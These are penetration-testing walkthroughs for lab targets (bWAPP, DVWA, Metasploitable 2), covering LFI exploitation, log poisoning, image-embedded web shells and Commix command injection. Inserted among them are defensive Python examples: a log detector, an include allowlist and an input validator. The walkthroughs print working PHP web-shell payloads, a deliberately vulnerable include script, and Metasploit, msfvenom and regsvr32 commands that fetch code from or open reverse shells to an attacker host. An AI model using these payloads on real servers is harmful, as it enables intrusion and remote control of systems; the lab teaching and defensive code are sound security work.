5 Ways to Exploit an LFI Vulnerability

The aim of this article is to show several techniques for attacking a web server that suffers from a file inclusion vulnerability. As most readers know, an LFI vulnerability lets a user include a file on the server by supplying its path in a URL. In this article I use two different platforms, bWAPP and DVWA, which both contain file inclusion vulnerabilities, and through them I perform the LFI attack in FOUR different ways.

Basic local file inclusion

Open the target IP in the browser and log in to bWAPP as bee:bug. Choose the bug "Remote & Local File Inclusion" and click Hack.

The requested web page, which suffers from RFI and LFI, opens. It asks you to select a language from a drop-down list; when you click Go, the selected language file is included via the URL. To perform the basic attack, change

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go into 192.168.1.101/bWAPP/rlfi.php?language=/etc/passwd

In a basic LFI attack we can read a file directly by its path, using (../) to traverse directories or simply an absolute path (/). In the screenshot below you can see that I have accessed the password file when the above URL is executed in the browser.

Null byte

In some scenarios the basic LFI attack above does not work because of a higher security level. In the image below you can see that I failed to read the password file when executing the same path in the URL. When we face this kind of problem, the next option is a NULL BYTE attack.

Now turn on Burp Suite to capture the browser request: select the Proxy tab and start intercepting. Do not forget to set the browser proxy when using Burp Suite.

Inside Burp Suite, send the intercepted data to Repeater.

In Repeater you can analyse the sent request and the response it generates. The screenshot makes it clear that /etc/passwd is not working and I am unable to read the password file.

In the following screenshot you can see that I forwarded the request after appending a null character (%00) to the path, i.e. /etc/passwd%00, and clicked Go. On the right side of the window the password file is returned in the response.

Base64 encoded

There is another way to exploit LFI when the security level is high and you are unable to view PHP file content: use the following php://filter stream wrapper, which base64-encodes the file instead of executing it.

http://192.168.1.101/bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd

In the screenshot you can see the content of the password file encoded in base64; copy the whole encoded text.

I am using HackBar, a Firefox plugin, to decode the copied text.

A pop-up box opens; paste the copied encoded text into it and click OK.

In the screenshot you can view the result and read the content of the password file.

PHP Input

Using the php://input wrapper we will execute injected PHP code to exploit the LFI vulnerability. I am going to perform this task with HackBar; first load the URL of the targeted web page, as shown in the screenshot.

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go

Now change the above URL to use the php://input wrapper:

http://192.168.1.101/bWAPP/rlfi.php?language=php://input&cmd=ls

Then tick the check box to enable Post data, which sends the request as a POST, and add the command payload <?php system($_GET['cmd']); ?> in the text area as shown in the following screenshot. Finally click Execute.

This lists the directories of the victim PC.

Now it is time to connect to the victim through a reverse connection: open a terminal in Kali Linux and type msfconsole to start the Metasploit Framework.

Now type use exploit/multi/script/web_delivery

msf exploit(web_delivery) > set target 1

msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp

msf exploit(web_delivery) > set lhost 192.168.0.104

msf exploit(web_delivery) > set srvport 8081

msf exploit(web_delivery) > exploit

Copy the highlighted text shown in the window below.

Paste the copied PHP code into the URL as shown in the image and execute it.

When the URL is executed, the attacker gets the victim's Meterpreter session inside Metasploit.

msf exploit(web_delivery) > sessions -i 1

meterpreter> sysinfo

Proc/self/environ

If the server is outdated, we can exploit it through LFI by including the /proc/self/environ file, which stores the User-Agent, where we will place our PHP code to execute a command.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=proc/self/environ

Now start Burp Suite, capture the browser request and send the fetched data to Repeater.

Add the command payload <?php system($_GET['cmd']); ?> in the User-Agent and send the request with the GET parameter 192.168.1.8/lfi/lfi.php?file=/var/www/apache2/access.log&cmd=id as shown in the image below. On the right side of the window you can see the highlighted result in the response.
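Every technique in this walkthrough leaves a recognisable trace in the web server's access log: a traversal sequence or absolute sensitive path in the query string, a %00 null byte, a php:// stream wrapper, or PHP tags in the User-Agent when the log or /proc/self/environ is being poisoned. The following detector is an added example written for this page, not code from the original article or from bWAPP/DVWA; the log lines are constructed to mirror the requests shown above, and the Apache combined log format is assumed.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format. Quoted fields may contain backslash-escaped quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Files a page/language parameter should never legitimately point at.
SENSITIVE_PATHS = ("/etc/passwd", "proc/self/environ", "access.log", "error.log")

# PHP stream wrappers that turn a file include into code execution or source disclosure.
STREAM_WRAPPERS = ("php://", "data://", "expect://", "phar://")


def decode_path(path):
    """URL-decode twice so double-encoded traversal (%252e%252e) and %00 are normalised."""
    return unquote(unquote(path))


def lfi_indicators(line):
    """Return the list of LFI indicators found in one access-log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    path = decode_path(m.group("path"))
    low = path.lower()
    ua = m.group("ua").lower()
    hits = []
    if "../" in path or "..\\" in path:
        hits.append("directory traversal")
    if "\x00" in path:
        hits.append("null byte")
    if any(w in low for w in STREAM_WRAPPERS):
        hits.append("php stream wrapper")
    if any(s in low for s in SENSITIVE_PATHS):
        hits.append("sensitive file")
    if "<?php" in ua or "<?=" in ua:
        hits.append("php code in user-agent (log poisoning)")
    return hits


def scan(lines):
    """Return (line index, indicators) for every line that has at least one indicator."""
    out = []
    for i, line in enumerate(lines):
        hits = lfi_indicators(line)
        if hits:
            out.append((i, hits))
    return out


# Constructed sample log, modelled on the requests used in the walkthrough above.
SAMPLE_LOG = [
    '192.168.1.50 - - [10/Oct/2017:10:00:01 +0000] "GET /bWAPP/rlfi.php?language=lang_en.php&action=go HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Oct/2017:10:00:02 +0000] "GET /bWAPP/rlfi.php?language=/etc/passwd%00 HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Oct/2017:10:00:03 +0000] "GET /bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 2460 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Oct/2017:10:00:04 +0000] "POST /bWAPP/rlfi.php?language=php://input&cmd=ls HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Oct/2017:10:00:05 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=ifconfig HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Oct/2017:10:00:06 +0000] "GET /lfi/lfi.php?file=/var/www/apache2/access.log&cmd=id HTTP/1.1" 200 4000 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '192.168.1.50 - - [10/Oct/2017:10:00:07 +0000] "GET /dvwa/vulnerabilities/fi/?page=proc/self/environ HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_LOG):
        print("line %d: %s" % (i, ", ".join(hits)))
```

Run it over a real access.log by replacing SAMPLE_LOG with the file's lines. The User-Agent check is the one that matters for the poisoning variants: by the time the poisoned log is included, the request that planted the code is already on disk, so alerting on PHP tags in any logged header gives the defender a signal before the second, triggering request arrives.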

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Exploit Webserver through Log Injection with LFI

In this article you will see how to perform local file inclusion log poisoning on the target machine and gain unauthorised access with the help of the Apache access.log file.

Attacker: Kali Linux

Target: Metasploitable 2

Connect to the target using the SSH service as shown in the following image.

ssh msfadmin@192.168.1.8

Now, using sudo, create a folder "lfi" inside /var/www

cd /var/www

mkdir lfi

Now create a PHP file that lets the user include a file through the file parameter. Using the file parameter we can then execute a file that contains malicious code to gain unauthorised access to the target PC.

<?php
// Deliberately vulnerable: the "file" parameter is passed straight to include().
$file = $_GET['file'];
if (isset($file)) {
    include("$file");
} else {
    include("index.php");
}
?>

I saved the PHP code above in a text file as lfi.php and shared this file.

To download lfi.php into the lfi directory, type the following command

wget http://192.168.1.25/lfi.php

Now let's browse to the following URL: 192.168.1.8/lfi/lfi.php

In the screenshot you can see that when I browsed to lfi.php it showed an error that looks like a local file inclusion vulnerability.

Now I will try to open the Apache access.log file. To explore this file, I first give read permission on the apache2 log directory and then include access.log.

Now include access.log as the file parameter by entering the following URL in the browser.

192.168.1.8/lfi/lfi.php?file=/var/www/apache2/access.log

Now turn on Burp Suite to capture the request for the same web page.

Here you get the intercepted data, where we need to inject our command payload into the User-Agent by replacing the highlighted data.

Add the command payload <?php system($_GET['cmd']); ?> in the User-Agent and send the request with the GET parameter 192.168.1.8/lfi/lfi.php?file=/var/www/apache2/access.log&cmd=ps as shown in the image below. Then click Forward.

This dumps the log data and also executes the command given through cmd. In the screenshot you can see both the log and the process list.

In the same manner execute lsb_release -a through cmd and view the result in the screenshot.
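The root cause in this lab's lfi.php is that a request parameter reaches include() unchanged, which is why an absolute path, a %00, a php:// wrapper, a traversal sequence and a log file all work. The fix is to stop treating the parameter as a path at all. The following resolver is an added example written for this page, not code from the article or from any of the lab applications; it is written in Python so it can be run stand-alone, but the two checks (allowlist of short keys that the server maps to file names, and a realpath containment test for pages that must accept a file name) are exactly what a PHP developer would put in front of include(). The web root, language file names and payload list are constructed for the demo.

```python
import os
import tempfile


class IncludeRejected(ValueError):
    """Raised when a request parameter must not reach include()."""


# Allowlist: the client sends a short key, the server chooses the file name (constructed names).
LANGUAGE_FILES = {"en": "lang_en.php", "fr": "lang_fr.php", "nl": "lang_nl.php"}


def _contained(base_dir, name):
    """Defence in depth: the resolved real path must stay inside base_dir and must exist."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise IncludeRejected("resolved path escapes base directory")
    if not os.path.isfile(target):
        raise IncludeRejected("file does not exist under base directory")
    return target


def resolve_allowlisted(param, base_dir, allowlist=LANGUAGE_FILES):
    """Preferred fix: map a request key to an allowlisted file under base_dir, or raise."""
    if not isinstance(param, str) or "\x00" in param:
        raise IncludeRejected("null byte or non-string parameter")
    if param not in allowlist:
        raise IncludeRejected("not in allowlist")
    return _contained(base_dir, allowlist[param])


def resolve_relative(param, base_dir):
    """Fallback for pages that must accept a file name: no wrappers, no absolute paths, no traversal."""
    if not isinstance(param, str) or "\x00" in param:
        raise IncludeRejected("null byte or non-string parameter")
    if "://" in param or param.startswith(("/", "\\")):
        raise IncludeRejected("stream wrapper or absolute path")
    if ".." in param.replace("\\", "/").split("/"):
        raise IncludeRejected("traversal component")
    return _contained(base_dir, param)


def _outcome(resolver, param, root):
    try:
        return "allowed:" + os.path.basename(resolver(param, root))
    except IncludeRejected as exc:
        return "rejected:" + str(exc)


def demo_results():
    """Run the walkthrough's payloads against a constructed web root; returns {payload: outcomes}."""
    root = tempfile.mkdtemp(prefix="lfi_demo_")
    for fname in LANGUAGE_FILES.values():
        with open(os.path.join(root, fname), "w") as fh:
            fh.write("<?php // constructed language file ?>\n")
    payloads = [
        "en",
        "lang_en.php",
        "/etc/passwd",
        "/etc/passwd\x00",
        "php://filter/read=convert.base64-encode/resource=/etc/passwd",
        "php://input",
        "../../hackable/uploads/shell.png",
        "proc/self/environ",
    ]
    return {
        p: {
            "allowlist": _outcome(resolve_allowlisted, p, root),
            "relative": _outcome(resolve_relative, p, root),
        }
        for p in payloads
    }


if __name__ == "__main__":
    for payload, outcome in demo_results().items():
        print("%-62r allowlist=%-30s relative=%s" % (payload, outcome["allowlist"], outcome["relative"]))
```

The allowlist variant rejects every payload from the walkthrough because none of them is a key; the relative variant rejects them on the wrapper, absolute-path, null-byte and traversal checks, and the final realpath test also catches a symlink inside the web root that points outside it. Note that "proc/self/environ" only fails the relative check because no such file exists under the constructed web root; the containment test is what guarantees it can never resolve to the real /proc.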


Web Server Exploitation with LFI and File Upload

In this article you will learn how to bypass the file upload protection at DVWA's high security level by combining it with the FILE INCLUSION vulnerability, and how to use local file inclusion to get a reverse connection from the victim's PC.

Attacker: Kali Linux

Target: DVWA

First you need to download the Exif Pilot tool from here. This is a GUI tool for Windows users that allows adding EXIF and other metadata to JPEG, PNG and GIF images.

Now open Exif Pilot and select an image to hide the malicious comment inside it; in the screenshot you can see I chose shell.png and then clicked EDIT EXIF/IPTC.

In the comment text field type <?php system($_GET['c']); ?> as the malicious code and click OK.

The EXIF data has now been edited successfully inside the image. The tool replaces the original image with the modified one in the same folder and sends the original to the Recycle Bin.

Now open the target IP in the browser and log in to DVWA with admin:password as credentials. Set the security level to high.

Choose the File Upload vulnerability to upload the malicious image to the web application; browse to your malicious image shell.png and click Upload.

It shows the path of the uploaded image; copy the highlighted path.

Open the copied path in the browser, where you will find the uploaded image.

To execute the malicious code we need to change the vulnerability category as well as the security level, so that the comment hidden inside the image is executed.

Now set the security level to low.

To bypass the file upload protection at DVWA's high security level we need to use another vulnerability, and I have selected File Inclusion for this purpose.

File Inclusion allows users to execute any file through the URL, as described above.

Now paste the copied path of the uploaded image into the URL as shown in the screenshot.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png

Here it gives the warning system(): cannot execute blank command, which means we need to add a command for execution; through the URL we can then execute any command.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=ifconfig

Here I check the network configuration of the victim's PC; you can see the result in the screenshot.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=dir

Here you can view the directories, which I got by executing the dir command in the URL.

Next I will try to get a Meterpreter session using Kali Linux.

Type msfconsole to load the Metasploit Framework.

use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.103

msf exploit(regsvr32_applocker_bypass_server) > set lport 1234

msf exploit(regsvr32_applocker_bypass_server) > exploit

regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll

Copy the above malicious code and send it to the victim.

Paste the regsvr32 command above into the URL; when it runs in the browser, the attacker gets the victim's Meterpreter session on their Kali Linux.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.png&c=regsvr32 /s /n /u /i:http://192.168.1.103:8080/7vnJTV4ONLKkU19.sct scrobj.dll

Meterpreter session 1 opens.

meterpreter > sysinfo

Second Way

In the second part we will combine a malicious PHP file with an image, upload that malicious image to the web application server, and then execute it in the same manner as above.

First download any .png/.jpg/.gif image and save it on the Desktop. Inside Kali Linux I downloaded an image and saved it with the name "a.png" on the desktop. Now open the terminal and type the following command to append PHP code to the "a.png" image.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 >> /root/Desktop/a.png

Let's verify whether the image contains the malicious code or not

cat /root/Desktop/a.png

When you scroll down the window you will find that the end of the image contains the PHP code. This means we have successfully created the malicious image, which is ready to upload to the web application server.

Now repeat the above process to upload the file to DVWA with security level high. In the screenshot you can see my "a.png" image has been uploaded successfully to the web server.

Copy the highlighted path where the image is uploaded.

Before executing the image on the web server, start multi/handler in the background inside Kali Linux

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.103

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

Again set the security level to low in DVWA, select the File Inclusion vulnerability and repeat the same process as above: paste the copied path of the uploaded image into the URL and execute it, which provides a reverse connection to Kali Linux.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/a.png

meterpreter > sysinfo

I have got a Meterpreter session on the victim PC.


Command Injection to Meterpreter using Commix

In this article I will show how easily you can hack a web server using the Commix tool if the server suffers from an OS command injection vulnerability, and then obtain a Meterpreter shell.

Attacker: Kali Linux

Target: bWAPP

Download it from here, install it and run it in VMware.

As the attacker, browse to the target IP: 192.168.0.105/bwapp, log in with bee:bug as credentials, select OS Command Injection from "Choose your bug" and click Hack.

The requested web page opens, where you can execute any command. Now I will start Burp Suite to capture the request: click the Proxy tab and turn on intercept, and don't forget to configure the proxy in the browser. Now enter something to look up, such as the IP 192.168.0.105, and click Lookup.

Inside Burp Suite you will see the POST request has been captured. Here we have the victim's details, which will be helpful for making an attack on its web server. Select the whole data from POST ... to &form=submit, copy it and save it in a text file. I saved it as os.txt to use with Commix.

In the previous tutorial we used manual steps inside Commix to execute the given command; here the steps are easier and more convenient. Type the following command for Commix to start the attack.

commix -r /root/Desktop/os.txt

Hit Enter or press Y in reply to every question. In the screenshot you can see I got the victim's shell and executed the following commands to retrieve the victim's details.

whoami

id

Now start a reverse TCP connection using the steps below.

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.0.104

commix(reverse_tcp) > set LPORT 8888

Commix asks which backdoor to use for the connection; type '2' for other reverse TCP shells.

commix(reverse_tcp) > 2

Commix asks for the target type; type '5' to use the PHP Meterpreter reverse TCP shell.

commix(reverse_tcp) > 5

Copy the highlighted text and paste it into another terminal; this loads the Metasploit Framework and starts the multi handler automatically in the background.

Once Metasploit has loaded, move back to the previous terminal where Commix is running and hit Enter.

In the screenshot you can see I have got a Meterpreter shell.

meterpreter > sysinfo
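The lookup form Commix attacks here works because whatever is typed into it is handed to a shell together with the lookup command, so a value such as "192.168.0.105; id" becomes two commands. The defence is to validate the value as a hostname or IP literal before it goes anywhere, and to run the helper without a shell so the value is always a single argument. The following is an added example written for this page, not bWAPP's code or Commix's; the validation rules (RFC 1123 labels, IPv4/IPv6 literals) and the sample inputs are assumptions for the demo, and the only function that would execute anything is separated out so the checks can be exercised without nslookup present.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname label: letters, digits, hyphens; no leading/trailing hyphen; 1-63 chars.
LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


class BadLookupTarget(ValueError):
    """Raised when the submitted value is not a plain hostname or IP address."""


def validate_lookup_target(value):
    """Return a canonical IP literal or hostname; reject anything else (spaces, ;, |, $, backticks ...)."""
    if not isinstance(value, str) or not value or len(value) > 253:
        raise BadLookupTarget("empty or oversized value")
    try:
        return str(ipaddress.ip_address(value))  # accepts IPv4 and IPv6 literals only
    except ValueError:
        pass
    host = value.rstrip(".")
    labels = host.split(".")
    if not all(LABEL_RE.match(label) for label in labels):
        raise BadLookupTarget("not a valid hostname or IP address")
    return host


def build_lookup_argv(value):
    """argv for the lookup helper: the validated value is one argument, never shell text."""
    return ["nslookup", validate_lookup_target(value)]


def run_lookup(value, timeout=10):
    """Execute the lookup with no shell involved (not called by the demo below)."""
    argv = build_lookup_argv(value)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout, check=False)
    return proc.stdout


# Constructed inputs: the legitimate ones from the walkthrough plus typical injection attempts.
SAMPLE_INPUTS = [
    "192.168.0.105",
    "www.example.com.",
    "2001:db8::1",
    "192.168.0.105; id",
    "192.168.0.105 | whoami",
    "$(id)",
    "`id`",
    "-v",
    "",
]


def demo_results():
    """Map each sample input to the argv it would produce, or the rejection reason."""
    out = {}
    for value in SAMPLE_INPUTS:
        try:
            out[value] = "ok:" + " ".join(build_lookup_argv(value))
        except BadLookupTarget as exc:
            out[value] = "rejected:" + str(exc)
    return out


if __name__ == "__main__":
    for value, result in demo_results().items():
        print("%-28r %s" % (value, result))
```

Because the value is passed as its own argv element, even a string that slipped past validation could not start a second command; the validator's job is to keep the lookup helper's own option parsing out of reach as well, which is why a leading hyphen is refused.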

